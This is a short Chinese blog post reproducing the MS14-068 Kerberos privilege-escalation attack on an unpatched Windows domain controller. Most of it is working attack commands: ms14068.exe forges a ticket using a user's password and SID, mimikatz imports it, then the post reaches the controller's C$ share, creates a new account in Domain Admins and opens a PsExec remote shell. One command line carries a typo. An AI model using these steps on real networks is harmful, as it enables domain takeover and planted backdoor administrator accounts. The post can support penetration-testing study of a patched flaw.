域渗透:MS14-068

ms14-068漏洞在域控没有打补丁(kb3011780)时,能将任意域用户,提升为域管理员权限。
详细介绍:深入解读MS14-068漏洞

补充:添加域用户MS14-068 域用户权限提升漏洞复现

  • ms14068.exe 伪造kerberos票据
    1
    2
    ms1m 4068.exe -u test@domaintest.com -p 123456 -s S-1-5-21-1607545464-3564583392-2085136103-1114
    -d WIN-0IQJV7P073G.domaintest.com
  • mimikatz 导入票据
1
mimikatz.exe "kerberos::ptc TGT_test@domaintest.com.ccache" exit

拿到域管理权限便可进行其他一系列操作

1
2
3
4
5
6
dir \\WIN-0IQJV7P073G.domaintest.com\c$    注意这里应为域控主机名称,不能为ip

net user admin xxxxx@password /add /domain
net group "Domain Admins" admin /add /domain

PsExec.exe \\192.168.111.129 cmd.exe

本文标题:域渗透:MS14-068

文章作者:boogle

发布时间:2018年08月26日 - 15:24

最后更新:2019年03月07日 - 11:36

原始链接:https://zhengbao.wang/域渗透:MS14-068/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗